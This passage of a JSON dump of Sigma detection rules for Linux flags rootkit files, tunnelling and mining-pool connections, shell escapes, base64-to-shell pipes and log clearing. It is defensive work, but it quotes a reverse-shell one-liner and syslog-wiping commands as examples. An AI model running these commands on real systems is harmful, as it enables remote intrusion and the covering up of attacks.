high\n"
  },
  {
    "path": "rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml",
    "content": "title: Potentially Suspicious Shell Script Creation in Profile Folder\nid: 13f08f54-e705-4498-91fd-cce9d9cee9f1\nstatus: test\ndescription: Detects the creation of shell scripts under the \"profile.d\" path.\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.persistence\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '/etc/profile.d/'\n        TargetFilename|endswith:\n            - '.csh'\n            - '.sh'\n    condition: selection\nfalsepositives:\n    - Legitimate shell scripts in the \"profile.d\" directory could be common in your environment. Apply additional filter accordingly via \"image\", by adding specific filenames you \"trust\" or by correlating it with other events.\n    - Regular file creation during system update or software installation by the package manager\nlevel: low # Can be increased to a higher level after some tuning\n"
  },
  {
    "path": "rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml",
    "content": "title: Triple Cross eBPF Rootkit Default LockFile\nid: c0239255-822c-4630-b7f1-35362bcb8f44\nstatus: test\ndescription: Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.\nreferences:\n    - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-05\nmodified: 2022-12-31\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename: '/tmp/rootlog'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml",
    "content": "title: Triple Cross eBPF Rootkit Default Persistence\nid: 1a2ea919-d11d-4d1e-8535-06cda13be20f\nstatus: test\ndescription: Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method\nreferences:\n    - https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-05\nmodified: 2022-12-31\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1053.003\n\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: 'ebpfbackdoor'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml",
    "content": "title: Wget Creating Files in Tmp Directory\nid: 35a05c60-9012-49b6-a11f-6bab741c9f74\nstatus: test\ndescription: Detects the use of wget to download content in a temporary directory such as \"/tmp\" or \"/var/tmp\"\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '/wget'\n        TargetFilename|startswith:\n            - '/tmp/'\n            - '/var/tmp/'\n    condition: selection\nfalsepositives:\n    - Legitimate downloads of files in the tmp folder.\nlevel: medium\n"
  },
  {
    "path": "rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml",
    "content": "title: Linux Reverse Shell Indicator\nid: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871\nstatus: test\ndescription: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')\nreferences:\n    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-10-16\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.t1059.004\nlogsource:\n    product: linux\n    category: network_connection\ndetection:\n    selection:\n        Image|endswith: '/bin/bash'\n    filter:\n        DestinationIp:\n            - '127.0.0.1'\n            - '0.0.0.0'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml",
    "content": "title: Linux Crypto Mining Pool Connections\nid: a46c93b7-55ed-4d27-a41b-c259456c4746\nstatus: stable\ndescription: Detects process connections to a Monero crypto mining pool\nreferences:\n    - https://www.poolwatch.io/coin/monero\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-10-26\ntags:\n    - attack.impact\n    - attack.t1496\nlogsource:\n    product: linux\n    category: network_connection\ndetection:\n    selection:\n        DestinationHostname:\n            - 'pool.minexmr.com'\n            - 'fr.minexmr.com'\n            - 'de.minexmr.com'\n            - 'sg.minexmr.com'\n            - 'ca.minexmr.com'\n            - 'us-west.minexmr.com'\n            - 'pool.supportxmr.com'\n            - 'mine.c3pool.com'\n            - 'xmr-eu1.nanopool.org'\n            - 'xmr-eu2.nanopool.org'\n            - 'xmr-us-east1.nanopool.org'\n            - 'xmr-us-west1.nanopool.org'\n            - 'xmr-asia1.nanopool.org'\n            - 'xmr-jp1.nanopool.org'\n            - 'xmr-au1.nanopool.org'\n            - 'xmr.2miners.com'\n            - 'xmr.hashcity.org'\n            - 'xmr.f2pool.com'\n            - 'xmrpool.eu'\n            - 'pool.hashvault.pro'\n            - 'moneroocean.stream'\n            - 'monerocean.stream'\n    condition: selection\nfalsepositives:\n    - Legitimate use of crypto miners\nlevel: high\n"
  },
  {
    "path": "rules/linux/network_connection/net_connection_lnx_domain_localtonet_tunnel.yml",
    "content": "title: Communication To LocaltoNet Tunneling Service Initiated - Linux\nid: c4568f5d-131f-4e78-83d4-45b2da0ec4f1\nstatus: test\ndescription: |\n    Detects an executable initiating a network connection to \"LocaltoNet\" tunneling sub-domains.\n    LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.\n    Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.\nreferences:\n    - https://localtonet.com/documents/supported-tunnels\n    - https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2024-06-17\ntags:\n    - attack.command-and-control\n    - attack.t1572\n    - attack.t1090\n    - attack.t1102\nlogsource:\n    category: network_connection\n    product: linux\ndetection:\n    selection:\n        DestinationHostname|endswith:\n            - '.localto.net'\n            - '.localtonet.com'\n        Initiated: 'true'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the LocaltoNet service.\nlevel: high\n"
  },
  {
    "path": "rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml",
    "content": "title: Communication To Ngrok Tunneling Service - Linux\nid: 19bf6fdb-7721-4f3d-867f-53467f6a5db6\nstatus: test\ndescription: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors\nreferences:\n    - https://twitter.com/hakluke/status/1587733971814977537/photo/1\n    - https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-11-03\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567\n    - attack.t1568.002\n    - attack.t1572\n    - attack.t1090\n    - attack.t1102\n    - attack.s0508\nlogsource:\n    product: linux\n    category: network_connection\ndetection:\n    selection:\n        DestinationHostname|contains:\n            - 'tunnel.us.ngrok.com'\n            - 'tunnel.eu.ngrok.com'\n            - 'tunnel.ap.ngrok.com'\n            - 'tunnel.au.ngrok.com'\n            - 'tunnel.sa.ngrok.com'\n            - 'tunnel.jp.ngrok.com'\n            - 'tunnel.in.ngrok.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of ngrok\nlevel: high\n"
  },
  {
    "path": "rules/linux/network_connection/net_connection_lnx_susp_malware_callback_port.yml",
    "content": "title: Potentially Suspicious Malware Callback Communication - Linux\nid: dbfc7c98-04ab-4ab7-aa94-c74d22aa7376\nrelated:\n    - id: 4b89abaa-99fe-4232-afdd-8f9aa4d20382\n      type: derived\nstatus: test\ndescription: |\n    Detects programs that connect to known malware callback ports based on threat intelligence reports.\nreferences:\n    - https://www.mandiant.com/resources/blog/triton-actor-ttp-profile-custom-attack-tools-detections\n    - https://www.mandiant.com/resources/blog/ukraine-and-sandworm-team\n    - https://www.elastic.co/guide/en/security/current/potential-non-standard-port-ssh-connection.html\n    - https://thehackernews.com/2024/01/systembc-malwares-c2-server-analysis.html\n    - https://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\nauthor: hasselj\ndate: 2024-05-10\ntags:\n    - attack.persistence\n    - attack.command-and-control\n    - attack.t1571\nlogsource:\n    category: network_connection\n    product: linux\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationPort:\n            - 888\n            - 999\n            - 2200\n            - 2222\n            - 4000\n            - 4444\n            - 6789\n            - 8531\n            - 50501\n            - 51820\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'         # IPv6 loopback\n            - 'fe80::/10'       # IPv6 link-local addresses\n            - 'fc00::/7'        # IPv6 private addresses\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_apt_shell_execution.yml",
    "content": "title: Shell Invocation via Apt - Linux\nid: bb382fd5-b454-47ea-a264-1828e4c766d6\nstatus: test\ndescription: |\n    Detects the use of the \"apt\" and \"apt-get\" commands to execute a shell or proxy commands.\n    Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\nreferences:\n    - https://gtfobins.github.io/gtfobins/apt/\n    - https://gtfobins.github.io/gtfobins/apt-get/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-28\nmodified: 2024-09-02\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith:\n            - '/apt'\n            - '/apt-get'\n        CommandLine|contains: 'APT::Update::Pre-Invoke::='\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_at_command.yml",
    "content": "title: Scheduled Task/Job At\nid: d2d642d7-b393-43fe-bae4-e81ed5915c4b\nstatus: stable\ndescription: |\n  Detects the use of at/atd which are utilities that are used to schedule tasks.\n  They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md\nauthor: Ömer Günal, oscd.community\ndate: 2020-10-06\nmodified: 2022-07-07\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.002\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/at'\n            - '/atd'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_auditctl_clear_rules.yml",
    "content": "title: Audit Rules Deleted Via Auditctl\nid: bed26dea-4525-47f4-b24a-76e30e44ffb0\nstatus: experimental\ndescription: |\n    Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.\n    This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.\n    Removal of audit rules can significantly impair detection of malicious activities on the affected system.\nreferences:\n    - https://www.atomicredteam.io/atomic-red-team/atomics/T1562.012\n    - https://linux.die.net/man/8/auditct\nauthor: Mohamed LAKRI\ndate: 2025-10-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.012\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/auditctl'\n        CommandLine|re: '-D'\n    condition: selection\nfalsepositives:\n    - An administrator troubleshooting. Investigate all attempts.\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_av_kaspersky_av_disabled.yml",
    "content": "title: Kaspersky Endpoint Security Stopped Via CommandLine - Linux\nid: 36388120-b3f1-4ce9-b50b-280d9a7f4c04\nstatus: experimental\ndescription: |\n  Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl.\n  This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors.\nreferences:\n    - https://support.kaspersky.com/KES4Linux/12.0.0/en-US/197929.htm\nauthor: Milad Cheraghi\ndate: 2025-10-18\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            # Note: Add the list of shells allowed in your environment that can be used to run init.d scripts.\n            - '/systemctl'\n            - '/bash'\n            - '/sh'\n        CommandLine|contains|all:\n            - 'stop'\n            - 'kesl'\n    condition: selection\nfalsepositives:\n    - System administrator manually stopping Kaspersky services\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_awk_shell_spawn.yml",
    "content": "title: Suspicious Invocation of Shell via AWK - Linux\nid: 8c1a5675-cb85-452f-a298-b01b22a51856\nstatus: test\ndescription: |\n    Detects the execution of \"awk\" or it's sibling commands, to invoke a shell using the system() function.\n    This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.\nreferences:\n    - https://gtfobins.github.io/gtfobins/awk/#shell\n    - https://gtfobins.github.io/gtfobins/gawk/#shell\n    - https://gtfobins.github.io/gtfobins/nawk/#shell\n    - https://gtfobins.github.io/gtfobins/mawk/#shell\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith:\n            - '/awk'\n            - '/gawk'\n            - '/mawk'\n            - '/nawk'\n        CommandLine|contains: 'BEGIN {system'\n    selection_cli:\n        CommandLine|contains:\n            - '/bin/bash'\n            - '/bin/dash'\n            - '/bin/fish'\n            - '/bin/sh'\n            - '/bin/zsh'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_base64_decode.yml",
    "content": "title: Decode Base64 Encoded Text\nid: e2072cab-8c9a-459b-b63c-40ae79e27031\nstatus: test\ndescription: Detects usage of base64 utility to decode arbitrary base64-encoded text\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/base64'\n        CommandLine|contains: '-d' # Also covers \"--decode\"\n    condition: selection\nfalsepositives:\n    - Legitimate activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_base64_execution.yml",
    "content": "title: Linux Base64 Encoded Pipe to Shell\nid: ba592c6d-6888-43c3-b8c6-689b8fe47337\nstatus: test\ndescription: Detects suspicious process command line that uses base64 encoded input for execution with a shell\nreferences:\n    - https://github.com/arget13/DDexec\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: pH-T (Nextron Systems)\ndate: 2022-07-26\nmodified: 2023-06-16\ntags:\n    - attack.defense-evasion\n    - attack.t1140\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_base64:\n        CommandLine|contains: 'base64 '\n    selection_exec:\n        - CommandLine|contains:\n              - '| bash '\n              - '| sh '\n              - '|bash '\n              - '|sh '\n        - CommandLine|endswith:\n              - ' |sh'\n              - '| bash'\n              - '| sh'\n              - '|bash'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml",
    "content": "title: Linux Base64 Encoded Shebang In CLI\nid: fe2f9663-41cb-47e2-b954-8a228f3b9dff\nstatus: test\ndescription: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded\nreferences:\n    - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html\n    - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-15\ntags:\n    - attack.defense-evasion\n    - attack.t1140\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - \"IyEvYmluL2Jhc2\" # Note: #!/bin/bash\"\n            - \"IyEvYmluL2Rhc2\" # Note: #!/bin/dash\"\n            - \"IyEvYmluL3pza\" # Note: #!/bin/zsh\"\n            - \"IyEvYmluL2Zpc2\" # Note: #!/bin/fish\n            - \"IyEvYmluL3No\" # Note: # !/bin/sh\"\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml",
    "content": "title: Bash Interactive Shell\nid: 6104e693-a7d6-4891-86cb-49a258523559\nstatus: test\ndescription: Detects execution of the bash shell with the interactive flag \"-i\".\nreferences:\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n    - https://www.revshells.com/\n    - https://linux.die.net/man/1/bash\nauthor: '@d4ns4n_'\ndate: 2023-04-07\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/bash'\n        CommandLine|contains: ' -i '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml",
    "content": "title: Enable BPF Kprobes Tracing\nid: 7692f583-bd30-4008-8615-75dab3f08a99\nstatus: test\ndescription: Detects common command used to enable bpf kprobes tracing\nreferences:\n    - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/\n    - https://bpftrace.org/\n    - https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-25\ntags:\n    - attack.execution\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'echo 1 >'\n            - '/sys/kernel/debug/tracing/events/kprobes/'\n        CommandLine|contains:\n            - '/myprobe/enable'\n            - '/myretprobe/enable'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml",
    "content": "title: BPFtrace Unsafe Option Usage\nid: f8341cb2-ee25-43fa-a975-d8a5a9714b39\nstatus: test\ndescription: Detects the usage of the unsafe bpftrace option\nreferences:\n    - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/\n    - https://bpftrace.org/\nauthor: Andreas Hunkeler (@Karneades)\ndate: 2022-02-11\ntags:\n    - attack.execution\n    - attack.t1059.004\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: 'bpftrace'\n        CommandLine|contains: '--unsafe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the unsafe option\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_cap_setgid.yml",
    "content": "title: Linux Setgid Capability Set on a Binary via Setcap Utility\nid: 3a716279-c18c-4488-83be-f9ececbfb9fc\nstatus: experimental\ndescription: |\n    Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file.\n    This capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs), including setting its current GID to a value that would otherwise be restricted (i.e. GID 0, the root group).\n    This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.\nreferences:\n    - https://man7.org/linux/man-pages/man8/setcap.8.html\n    - https://dfir.ch/posts/linux_capabilities/\n    - https://juggernaut-sec.com/capabilities/#cap_setgid\nauthor: Luc Génaux\ndate: 2026-01-24\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1548\n    - attack.t1554\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/setcap'\n        CommandLine|contains: 'cap_setgid'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_cap_setuid.yml",
    "content": "title: Linux Setuid Capability Set on a Binary via Setcap Utility\nid: ed447910-bc30-4575-a598-3a2e49516a7a\nstatus: experimental\ndescription: |\n    Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file.\n    This capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs), including setting its current UID to a value that would otherwise be restricted (i.e. UID 0, the root user).\n    This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.\nreferences:\n    - https://man7.org/linux/man-pages/man8/setcap.8.html\n    - https://dfir.ch/posts/linux_capabilities/\n    - https://juggernaut-sec.com/capabilities/#cap_setuid\nauthor: Luc Génaux\ndate: 2026-01-24\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1548\n    - attack.t1554\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/setcap'\n        CommandLine|contains: 'cap_setuid'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml",
    "content": "title: Capabilities Discovery - Linux\nid: d8d97d51-122d-4cdd-9e2f-01b4b4933530\nstatus: test\ndescription: Detects usage of \"getcap\" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.\nreferences:\n    - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes\n    - https://github.com/carlospolop/PEASS-ng\n    - https://github.com/diego-treitos/linux-smart-enumeration\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-28\nmodified: 2026-01-24\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/getcap'\n        CommandLine|contains: ' -r '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_capsh_shell_invocation.yml",
    "content": "title: Capsh Shell Invocation - Linux\nid: db1ac3be-f606-4e3a-89e0-9607cbe6b98a\nstatus: test\ndescription: |\n    Detects the use of the \"capsh\" utility to invoke a shell.\nreferences:\n    - https://gtfobins.github.io/gtfobins/capsh/#shell\n    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/capsh'\n        CommandLine|endswith: ' --'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml",
    "content": "title: Remove Immutable File Attribute\nid: 34979410-e4b5-4e5d-8cfb-389fdff05c12\nrelated:\n    - id: a5b977d6-8a81-4475-91b9-49dbfcd941f7\n      type: derived\nstatus: test\ndescription: Detects usage of the 'chattr' utility to remove immutable file attribute.\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-15\ntags:\n    - attack.defense-evasion\n    - attack.t1222.002\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/chattr'\n        CommandLine|contains: ' -i '\n    condition: selection\nfalsepositives:\n    - Administrator interacting with immutable files (e.g. for instance backups).\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_chroot_execution.yml",
    "content": "title: Linux Sudo Chroot Execution\nid: f2bed782-994e-4f40-9cd5-518198cb3fba\nstatus: experimental\ndescription: |\n    Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution.\n    Attackers may use this technique to evade detection and execute commands in a modified environment.\n    This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463.\n    While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts.\nreferences:\n    - https://github.com/kh4sh3i/CVE-2025-32463/blob/81bb430f84fa2089224733c3ed4bfa434c197ad4/exploit.sh\nauthor: Swachchhanda Shrawn Poudel (Nextron Systems)\ndate: 2025-10-02\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/sudo'\n        CommandLine|contains:\n            - ' --chroot '\n            - 'sudo -R '\n    condition: selection\nfalsepositives:\n    - Legitimate administrative tasks or scripts that use 'sudo --chroot' for containerization, testing, or system management.\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_clear_logs.yml",
    "content": "title: Clear Linux Logs\nid: 80915f59-9b56-4616-9de0-fd0dea6c12fe\nstatus: stable\ndescription: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md\nauthor: Ömer Günal, oscd.community\ndate: 2020-10-07\nmodified: 2022-09-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070.002\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/rm'    # covers /rmdir as well\n            - '/shred'\n            - '/unlink'\n        CommandLine|contains:\n            - '/var/log'\n            - '/var/spool/mail'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml",
    "content": "title: Syslog Clearing or Removal Via System Utilities\nid: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31\nstatus: test\ndescription: |\n    Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md\n    - https://www.virustotal.com/gui/file/54d60fd58d7fa3475fa123985bfc1594df26da25c1f5fbc7dfdba15876dd8ac5/behavior\nauthor: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-10-15\nmodified: 2025-10-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070.002\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_file:\n        CommandLine|contains: '/var/log/syslog'\n    selection_command_rm:\n        # Examples:\n        #   rm -f /var/log/syslog\n        Image|endswith: '/rm'\n        CommandLine|contains:\n            - ' -r '\n            - ' -f '\n            - ' -rf '\n            - '/var/log/syslog' # We use this to avoid re-writing a separate selection\n    selection_command_unlink:\n        # Examples:\n        #   unlink /var/log/syslog\n        Image|endswith: '/unlink'\n    selection_command_mv:\n        # Examples:\n        #   mv /var/log/syslog\n        Image|endswith: '/mv'\n    selection_command_truncate:\n        # Examples:\n        #   truncate --size 0 /var/log/syslog\n        Image|endswith: '/truncate'\n        CommandLine|contains|all:\n            - '0 '\n            - '/var/log/syslog' # We use this to avoid re-writing a separate selection\n        CommandLine|contains:\n            - '-s '\n            - '-c '\n            - '--size'\n    selection_command_ln:\n        # Examples:\n        #   ln -sfn /dev/null /var/log/syslog\n        Image|endswith: '/ln'\n        CommandLine|contains|all:\n            - '/dev/null '\n            - '/var/log/syslog' # We use this to avoid re-writing a separate selection\n        CommandLine|contains:\n            - '-sf '\n            - '-sfn '\n            - '-sfT '\n    selection_command_cp:\n        # Examples:\n        #   cp /dev/null /var/log/syslog\n        Image|endswith: '/cp'\n        CommandLine|contains: '/dev/null'\n    selection_command_shred:\n        # Examples:\n        #   shred -u /var/log/syslog\n        Image|endswith: '/shred'\n        CommandLine|contains: '-u '\n    